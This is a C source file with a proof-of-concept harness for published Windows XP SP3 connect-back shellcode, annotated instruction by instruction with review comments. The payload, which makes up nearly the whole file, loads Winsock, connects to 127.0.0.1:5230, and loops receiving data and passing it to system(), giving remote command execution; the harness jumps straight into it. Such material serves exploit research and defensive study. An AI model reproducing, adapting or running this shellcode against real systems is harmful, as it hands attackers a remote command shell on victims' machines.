/*------------------------------------------------------------------------
  Title...................Windows XP SP3 EN Null-free Connect Back Shellcode 228 Bytes
  Release Date............12/7/2010
  Tested On...............Windows XP SP3 EN
  ------------------------------------------------------------------------
  Author..................John Leitch
  Site....................http://www.johnleitch.net/
  Email...................john.leitch5@gmail.com
  ------------------------------------------------------------------------*/

/*
 * Proof-of-concept harness that runs the shellcode in-process: the byte
 * string below is the payload and `__asm jmp shellcode` transfers control
 * into it (MSVC inline assembly, 32-bit only).
 *
 * Review notes (code left unchanged):
 *  - No #include appears in the file as shown, so printf and strlen are
 *    implicitly declared; add <stdio.h> and <string.h> if this is built.
 *  - strlen returns size_t but is printed with "%i"; "%zu" is the matching
 *    specifier.
 *  - strlen is used as the length only because the payload contains no
 *    0x00 byte (the "Null-free" property named in the header). Any NUL
 *    would truncate the reported length, not the jump.
 *  - The payload resolves APIs through the absolute addresses written at
 *    the two `mov dword ptr` lines near the top (7C80AE40h, 7C801D7Bh),
 *    which pins it to the build named in the header (XP SP3 EN); on other
 *    builds it presumably crashes rather than runs.
 *  - The jump lands in a string literal, i.e. data the compiler places in
 *    a read-only section; on a system enforcing DEP this is expected to
 *    fault, which is also the behavior a defender would want to confirm.
 *
 * @param argc  Unused by the C code; the payload reuses its stack slot
 *              (see the comment "dword ptr [argc]") as scratch storage.
 * @param argv  Unused.
 * @return      0 is never reached when the jump succeeds.
 */
int main(int argc, char *argv[])
{
	// Connects back to 127.0.0.1:5230 (the header and the "conn"+"ect" pushes
	// below indicate a connect, not a listen; the IP/port bytes are assembled
	// at the push 7Fh / push 6E140102h lines).
    char* shellcode=
        "\x33\xDB"                      // xor         ebx,ebx
        "\xC7\x45\x08\x40\xAE\x80\x7C"  // mov         dword ptr [argc],7C80AE40h   -- hard-coded API address (build-specific)
        "\xC7\x45\x04\x7B\x1D\x80\x7C"  // mov         dword ptr [ebp+4],7C801D7Bh  -- hard-coded API address (build-specific)
        "\x68\x64\x6C\x6C\x01"          // push        16C6C64h
        "\xD0\x6C\x24\x03"              // shr         byte ptr [esp+3],1
        "\x68\x6B\x33\x32\x2E"          // push        2E32336Bh
        "\x68\x77\x73\x6F\x63"          // push        636F7377h
        "\x54"                          // push        esp
        "\xFF\x55\x04"                  // call        dword ptr [ebp+4]
        "\x8B\xF0"                      // mov         esi,eax
        "\x53"                          // push        ebx
        "\xC6\x04\x24\x75"              // mov         byte ptr [esp],75h
        "\xC6\x44\x24\x01\x70"          // mov         byte ptr [esp+1],70h
        "\x68\x74\x61\x72\x74"          // push        74726174h
        "\x68\x57\x53\x41\x53"          // push        53415357h
        "\x54"                          // push        esp
        "\x56"                          // push        esi
        "\xFF\x55\x08"                  // call        dword ptr [argc]
        "\x83\xEC\x7F"                  // sub         esp,7Fh
        "\x83\xEC\x7F"                  // sub         esp,7Fh
        "\x83\xEC\x7F"                  // sub         esp,7Fh
        "\x83\xEC\x13"                  // sub         esp,13h
        "\x54"                          // push        esp
        "\x54"                          // push        esp
        "\xFF\xD0"                      // call        eax
        "\x53"                          // push        ebx
        "\xC6\x04\x24\x65"              // mov         byte ptr [esp],65h
        "\xC6\x44\x24\x01\x74"          // mov         byte ptr [esp+1],74h
        "\x68\x73\x6F\x63\x6B"          // push        6B636F73h
        "\x54"                          // push        esp
        "\x56"                          // push        esi
        "\xFF\x55\x08"                  // call        dword ptr [argc]
        "\x53"                          // push        ebx
        "\x6A\x01"                      // push        1
        "\x6A\x02"                      // push        2
        "\xFF\xD0"                      // call        eax
        "\x89\x45\xFC"                  // mov         dword ptr [ebp-4],eax
        "\x68\x65\x63\x74\x01"          // push        1746365h
        "\xD0\x6C\x24\x03"              // shr         byte ptr [esp+3],1
        "\x68\x63\x6F\x6E\x6E"          // push        6E6E6F63h
        "\x54"                          // push        esp
        "\x56"                          // push        esi
        "\xFF\x55\x08"                  // call        dword ptr [argc]
        "\x6A\x01"                      // push        1
        "\x6A\x7F"                      // push        7Fh                          -- 127.0.0.1 is built here (7F 00 00 01)
        "\xC6\x44\x24\x03\x01"          // mov         byte ptr [esp+3],1
        "\x68\x02\x01\x14\x6E"          // push        6E140102h                    -- family 2, port bytes 14 6E = 5230 after the shr
        "\xD0\x6C\x24\x01"              // shr         byte ptr [esp+1],1
        "\x8B\xFC"                      // mov         edi,esp
        "\x6A\x10"                      // push        10h
        "\x57"                          // push        edi
        "\xFF\x75\xFC"                  // push        dword ptr [ebp-4]
        "\xFF\xD0"                      // call        eax
        "\x53"                          // push        ebx
        "\x68\x72\x65\x63\x76"          // push        76636572h
        "\x54"                          // push        esp
        "\x56"                          // push        esi
        "\xFF\x55\x08"                  // call        dword ptr [argc]
        "\x53"                          // push        ebx
        "\x6A\x7F"                      // push        7Fh
        "\x57"                          // push        edi
        "\xFF\x75\xFC"                  // push        dword ptr [ebp-4]
        "\xFF\xD0"                      // call        eax
        "\x53"                          // push        ebx
        "\xC6\x04\x24\x6C"              // mov         byte ptr [esp],6Ch
        "\xC6\x44\x24\x01\x6C"          // mov         byte ptr [esp+1],6Ch
        "\x68\x72\x74\x2E\x64"          // push        642E7472h
        "\x68\x6D\x73\x76\x63"          // push        6376736Dh
        "\x54"                          // push        esp
        "\xFF\x55\x04"                  // call        dword ptr [ebp+4]
        "\x53"                          // push        ebx
        "\xC6\x04\x24\x65"              // mov         byte ptr [esp],65h
        "\xC6\x44\x24\x01\x6D"          // mov         byte ptr [esp+1],6Dh
        "\x68\x73\x79\x73\x74"          // push        74737973h
        "\x54"                          // push        esp
        "\x50"                          // push        eax
        "\xFF\x55\x08"                  // call        dword ptr [argc]
        "\x57"                          // push        edi
        "\xFF\xD0"                      // call        eax
        "\xEB\xBB"                      // jmp         recv_loop (4010B3h)           -- backward jump: the payload loops and never returns here
        ;
 
    // Length via strlen is only valid because the payload has no NUL byte;
    // "%i" does not match size_t ("%zu" would).
    printf("shellcode length: %i", strlen(shellcode));
 
    // MSVC-only inline asm: control transfers into the string literal above.
    __asm jmp shellcode
  
    return 0;
}